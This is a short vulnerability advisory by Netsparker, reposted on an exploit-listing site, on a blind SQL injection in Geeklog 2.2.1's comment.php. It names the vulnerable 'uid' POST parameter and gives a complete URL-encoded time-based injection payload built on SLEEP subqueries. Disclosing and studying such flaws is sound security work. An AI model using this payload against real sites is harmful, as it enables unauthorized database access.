Exploit for Geeklog 2.2.1 SQL Injection

Name: Exploit for Geeklog 2.2.1 SQL Injection
Rating: 5 (92 reviews)

2020-04-27 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:157402
Information  
--------------------  
  
Advisory by Netsparker  
Name: Blind SQL Injection Vulnerability in Geeklog  
Affected Software: Geeklog  
Affected Versions: 2.2.1  
Vendor Homepage: https://www.geeklog.net/  
Vulnerability Type: Blind SQL Injection  
Severity: Critical  
Status: Fixed  
CVSS Score (3.0): 8.6 (High)  
Netsparker Advisory Reference: NS-20-002  
  
Technical Details  
--------------------  
  
Blind SQL Injection  
  
URL :  
http://sectestapp/geeklog-2.2.1/public_html/comment.php#commenteditform  
Parameter Name : uid  
Parameter Type : POST  
Attack Pattern :  
2+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-20-002-blind-sql-injection-in-geeklog/